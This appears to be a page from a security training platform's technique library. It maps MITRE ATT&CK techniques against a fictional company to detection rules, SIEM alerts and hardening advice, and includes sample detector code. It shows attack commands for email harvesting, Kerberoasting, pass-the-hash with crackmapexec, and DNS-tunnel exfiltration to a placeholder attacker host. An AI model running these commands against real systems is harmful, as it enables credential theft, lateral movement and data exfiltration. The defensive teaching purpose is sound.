Technique Library
ATT&CK-aligned techniques — interactive terminals let you run simulated attacks and see exactly what fires on the blue side.
TA0043 Reconnaissance
T1596.002 DNS / Passive Recon
Tags: Passive, OSINT

Query public DNS records and certificate transparency logs to enumerate subdomains and infrastructure without touching the target. Completely passive — leaves zero logs on the target's systems.

Blue Team View — T1596.002 Passive DNS
Detection Note LOW SIGNAL
{
  "note": "Passive recon leaves NO direct logs on your infrastructure",
  "detection_vector": "Certificate Transparency monitoring (external)",
  "recommend": "Subscribe to crt.sh alerts for your domains",
  "siem_rule": "N/A — blind spot by design"
}
Detection
Passive recon generates no logs on your infra
Monitor crt.sh CT logs for your domains via external tooling
Track new subdomain registrations with a monitoring service
Hardening
Audit public DNS — remove unused/dev subdomains
Don't expose staging via public DNS
Review CT logs regularly for unexpected certs
SIEM Notes
No direct detection possible for passive recon
Downstream: unusual access patterns may appear post-recon
T1589.002 Email Address Harvesting
Tags: OSINT, Passive

Collect employee email addresses from LinkedIn, breach dumps, and search engine dorking. Email lists feed directly into phishing campaigns and password sprays. theHarvester aggregates multiple OSINT sources automatically.

# theHarvester — multi-source email enumeration
$ theHarvester -d ficsit-pioneer.corp -b all
Blue Team View — T1589.002 Email Harvesting
Detection
Undetectable via standard SIEM — external passive activity
LinkedIn scraping is external to your network
Monitor HaveIBeenPwned / breach databases for your domain
Hardening
Use role-based email aliases (security@, noc@) not personal
Employee awareness: limit personal emails on LinkedIn
Check your domain in breach databases regularly
Downstream Risk
Email list → targeted phishing campaigns (T1566)
Email list → password spray userlist (T1110.003)
Discovered names → pretexting & vishing attacks
TA0001 Initial Access
T1566.002 AiTM Phishing (Spear-phishing Link)
Tags: Phishing, AiTM, MFA Bypass

Adversary-in-the-Middle phishing proxies the real login page so the victim completes MFA while the attacker captures the session cookie. The IRON CHIMNEY campaign used this against Ficsit Inc. via invoices-ficsit.io to compromise marcus.chen's account.

Blue Team View — T1566.002 AiTM Phishing · IRON CHIMNEY
MailGuard Alert — THREAT-001 HIGH
{
  "alert_id": "THREAT-001",
  "rule": "Typosquat Domain — Phishing Link Delivered",
  "severity": "HIGH",
  "sender": "billing@invoices-ficsit.io",
  "recipient": "marcus.chen@ficsit-pioneer.corp",
  "subject": "Invoice #INV-2024-0847 — Action Required",
  "phishing_url": "https://invoices-ficsit.io/login",
  "technique": "AiTM proxy — session cookie capture",
  "mitre": "T1566.002",
  "campaign": "IRON CHIMNEY"
}
Email Detection
Typosquat domain — invoices-ficsit.io vs ficsit-pioneer.corp
No SPF/DKIM from attacker domain
Suspicious link in body — mismatched sender domain
Identity Signals
Sign-in from unexpected IP post-phishing
Session cookie reuse from Tor exit node
Successful MFA but unusual location → Identity risk alert
Hardening
Phishing-resistant MFA (FIDO2/hardware key)
Conditional Access: block Tor exit nodes
DMARC enforcement + link scanning in email gateway
TA0004 Privilege Escalation
T1110.003 Password Spraying
Tags: Brute Force, AD, M365

Test one or a few common passwords across a large list of accounts, staying below lockout thresholds. Highly effective against orgs with weak password policies. The Ficsit Inc. priya.khatri account was compromised using this technique (Welcome1!).

Blue Team View — T1110.003 Password Spray
SIEM Alert — ALT-2024-8847 HIGH
{
  "alert_id": "ALT-2024-8847",
  "rule": "Password Spray — Low-and-Slow LDAP",
  "severity": "HIGH",
  "source_ip": "192.168.2.50",
  "target_domain": "ficsit-pioneer.corp",
  "event_id": 4625,
  "unique_accounts_targeted": 29,
  "total_failures": 86,
  "spray_window_mins": 30,
  "compromised": ["priya.khatri"],
  "mitre": "T1110.003",
  "timestamp": "2024-03-15T14:22:41Z"
}
Event IDs
4625 — Failed logon (bulk from single source)
4624 — Successful logon (after valid hit)
Logon Type 3 (Network) from non-admin workstation
SIEM Rule
More than 10 unique accounts failing auth from the same IP within 30 min
Pattern: 1 attempt per account (avoids lockout)
Correlate: success event 4624 following spray window
Hardening
Enforce MFA on all accounts
Password policy: ban common passwords (AAD/Entra banned list)
Smart lockout & risk-based Conditional Access
Alert on spray pattern even below lockout threshold
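As an added illustration of the SIEM rule above (example code, not part of the foyl Red platform): a small Python detector that applies the spray thresholds to constructed 4625/4624 events from one source IP and correlates a later successful logon with a sprayed account. The event field names and sample values are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security events (not real telemetry): 4625 = failed
# logon, 4624 = successful logon, logon_type 3 = network logon.
SAMPLE_EVENTS = [
    {"ts": f"2024-03-15T14:{i:02d}:00Z", "event_id": 4625, "src_ip": "192.168.2.50",
     "account": f"user{i:02d}", "logon_type": 3}
    for i in range(12)                       # 12 accounts, one failure each
] + [
    {"ts": "2024-03-15T14:13:00Z", "event_id": 4625, "src_ip": "192.168.2.50",
     "account": "priya.khatri", "logon_type": 3},
    {"ts": "2024-03-15T14:22:41Z", "event_id": 4624, "src_ip": "192.168.2.50",
     "account": "priya.khatri", "logon_type": 3},   # the valid hit after the spray
] + [
    # One user mistyping their own password is not a spray (1 account, 5 tries).
    {"ts": f"2024-03-15T15:0{i}:00Z", "event_id": 4625, "src_ip": "10.0.0.7",
     "account": "bob.lee", "logon_type": 3}
    for i in range(5)
]

def _ts(e):
    return datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")

def detect_spray(events, window_mins=30, min_accounts=10, max_per_account=2):
    """Flag a source IP when more than min_accounts distinct accounts fail inside
    the window and no account is hit more than max_per_account times (low-and-slow,
    below lockout); then correlate with 4624 from that IP for a sprayed account."""
    window = timedelta(minutes=window_mins)
    fails = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625 and e["logon_type"] == 3:
            fails[e["src_ip"]].append(e)
    alerts = []
    for ip, evs in fails.items():
        evs.sort(key=_ts)
        for i, first in enumerate(evs):          # slide the window over failures
            in_win = [e for e in evs[i:] if _ts(e) - _ts(first) <= window]
            per_acct = defaultdict(int)
            for e in in_win:
                per_acct[e["account"]] += 1
            if len(per_acct) > min_accounts and max(per_acct.values()) <= max_per_account:
                hits = sorted({e["account"] for e in events
                               if e["event_id"] == 4624 and e["src_ip"] == ip
                               and e["account"] in per_acct and _ts(e) >= _ts(first)})
                alerts.append({"rule": "Password Spray, low-and-slow", "source_ip": ip,
                               "unique_accounts_targeted": len(per_acct),
                               "total_failures": len(in_win), "compromised": hits})
                break                            # one alert per source IP
    return alerts
```

The bob.lee failures never trigger because they come from one account; the spray is caught even though no single account crosses a lockout threshold.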
T1558.003 Kerberoasting
Tags: Kerberos, AD, Offline Crack

Request Kerberos TGS tickets for service accounts (SPNs) and crack them offline. Service accounts often have long-lived, weak passwords set by humans years ago. RC4-encrypted tickets crack much faster than AES256 — look for etype 0x17 in Event 4769.

# Request TGS tickets for all SPNs in the domain
$ GetUserSPNs.py ficsit-pioneer.corp/marcus.chen -request
Compromise required: marcus.chen credentials
Blue Team View — T1558.003 Kerberoasting
SIEM Alert — ALT-2024-4769 HIGH
{
  "alert_id": "ALT-2024-4769",
  "rule": "Kerberoasting — RC4 TGS Bulk Request",
  "event_id": 4769,
  "ticket_encryption": "0x17 (RC4-HMAC) — crackable offline",
  "requester": "marcus.chen@ficsit-pioneer.corp",
  "spns_requested": 7,
  "time_window_secs": 8,
  "severity": "HIGH"
}
Event IDs
4769 — Kerberos TGS requested (on DC)
Filter: EncryptionType = 0x17 (RC4) — crackable
Alert on: >5 TGS requests (RC4) from one host in 60s
SIEM Detection
Single user requesting TGS for multiple SPNs
Non-admin requesting service account tickets
Correlate with first-time service account access
Hardening
Use AES256 encryption on all service accounts
Managed Service Accounts (gMSA) — auto-rotating
Service account passwords >25 chars
Audit SPNs — remove unused service accounts
TA0008 Lateral Movement
T1550.002 Pass-the-Hash (PtH)
Tags: NTLM, SMB, Lateral

Authenticate to remote services using a captured NTLM hash — no plaintext password needed. Particularly effective when the same local admin hash is shared across many machines (pre-LAPS environments). Works against SMB, WMI, WinRM, RDP (NLA disabled).

# CrackMapExec — PtH across subnet
$ crackmapexec smb 192.168.1.0/24 \
  -u Administrator \
  -H aad3b435b51404ee:a823f29b9f43d20a
Hash from: mimikatz / LSASS dump
Blue Team View — T1550.002 Pass-the-Hash
SIEM Alert — ALT-2024-5140 · IRON CHIMNEY HIGH
{
  "alert_id": "ALT-2024-5140",
  "rule": "Lateral Movement — SMB Admin Share Access",
  "event_id": 5140,
  "account": "FICSIT\\Administrator",
  "source_host": "RESEARCH-STATION-01",
  "targets_accessed": ["FIC-DC-01", "FIC-EXCH-01", "FINANCE-WS-01"],
  "share": "ADMIN$",
  "logon_type": 3,
  "mitre": "T1550.002",
  "campaign": "INV-2024-0087 IRON CHIMNEY"
}
Event IDs
4624 — Network logon (Type 3) from workstation
5140 — Admin share accessed (C$, ADMIN$)
4648 — Explicit credential use
SIEM Rule
Same account: 3+ hosts in <5 min (lateral pattern)
Admin share access from non-admin workstation
Logon Type 3 + admin share = high-fidelity alert
Hardening
LAPS — unique local admin password per machine
Disable NTLM authentication where Kerberos available
Protected Users security group
Credential Guard — protects LSASS
TA0010 Exfiltration
T1048.003 Exfil Over Alternative Protocol (DNS)
Tags: DNS, Covert, Bypass

Encode data in DNS queries/responses to exfiltrate through firewalls that allow outbound DNS. DNS is almost universally permitted outbound — even strict firewall rules rarely block it. The m.blake scenario in Ficsit also included Dropbox and Telegram exfil via CASB-visible channels.

# DNS tunnel exfil — encode file in TXT record queries
$ iodined -f 10.0.0.1 tunnel.attacker.com
# On victim (m.blake workstation):
$ iodine -f tunnel.attacker.com
Blue Team View — T1048.003 DNS Tunneling · m.blake exfil
NGFW Alert — Anomalous DNS Volume HIGH
{
  "alert_id": "FW-2024-3391",
  "rule": "DNS Tunneling — High Query Volume + Long Labels",
  "source_host": "m.blake workstation (192.168.3.88)",
  "dns_queries_per_min": 847,
  "avg_query_length_chars": 118,
  "external_domain": "*.tunnel.attacker.com",
  "entropy": "HIGH (base64 encoded data)",
  "mitre": "T1048.003"
}
DNS Signals
High-entropy subdomain labels (base64-encoded data)
Queries >100 chars — abnormal DNS label length
High query volume from single host to one domain
Cloud / CASB
m.blake — Dropbox upload from non-corp device
Telegram API outbound from workstation
CASB: unsanctioned cloud app data transfer >50MB
Hardening
DNS filtering with query analytics
Block non-business DNS resolvers
CASB: block unsanctioned cloud storage
DLP on large outbound transfers
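An added example (not from the page or the platform) that scores a constructed DNS query log against the three DNS signals listed above: per-host query volume to one domain, average query length, and entropy of the subdomain labels. The log layout, thresholds and sample hostnames are assumptions, and the registered domain is approximated as the last two labels.

```python
import base64, hashlib, math
from collections import defaultdict

def _chunk(seed):
    """Deterministic base32 label standing in for a tunnel's encoded file data."""
    return base64.b32encode(hashlib.sha256(seed.encode()).digest()).decode().lower().rstrip("=")

# Constructed one-minute query log as (client_ip, qname) pairs; not a real capture.
# 300 tunnel queries from the m.blake workstation plus a little ordinary traffic.
SAMPLE_QUERIES = [
    ("192.168.3.88", f"{_chunk(f'a{i}')}.{_chunk(f'b{i}')}.tunnel.attacker.com")
    for i in range(300)
] + [
    ("192.168.3.88", "www.ficsit-pioneer.corp"), ("192.168.3.88", "mail.ficsit-pioneer.corp"),
    ("192.168.3.90", "cdn.example.net"),
] * 10

def shannon_entropy(s):
    """Bits per character; base32/base64 payloads score far above hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def detect_dns_tunnel(queries, window_mins=1, min_qpm=100, min_avg_len=100, min_entropy=4.0):
    """Group queries by (client, registered domain) and alert when volume,
    average query length and subdomain entropy all exceed their thresholds.
    The registered domain is taken as the last two labels (a simplification;
    production code would consult the public suffix list)."""
    groups = defaultdict(list)
    for client, qname in queries:
        labels = qname.rstrip(".").split(".")
        groups[(client, ".".join(labels[-2:]))].append(qname)
    alerts = []
    for (client, domain), names in groups.items():
        qpm = len(names) / window_mins
        avg_len = sum(map(len, names)) / len(names)
        # Only the labels under the registered domain carry payload.
        ent = shannon_entropy("".join(n[: -len(domain) - 1] for n in names))
        if qpm >= min_qpm and avg_len > min_avg_len and ent >= min_entropy:
            alerts.append({"source_host": client, "external_domain": "*." + domain,
                           "dns_queries_per_min": qpm,
                           "avg_query_length_chars": round(avg_len),
                           "entropy": round(ent, 2)})
    return alerts
```

Requiring all three signals together keeps ordinary high-volume lookups (short, low-entropy names to a corporate domain) from alerting.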
Remaining Tactics — Coming Soon
TA0002 · Execution
TA0003 · Persistence
TA0005 · Defense Evasion
TA0006 · Credential Access
TA0007 · Discovery
TA0009 · Collection
TA0011 · Command & Control
TA0042 · Resource Development
TA0040 · Impact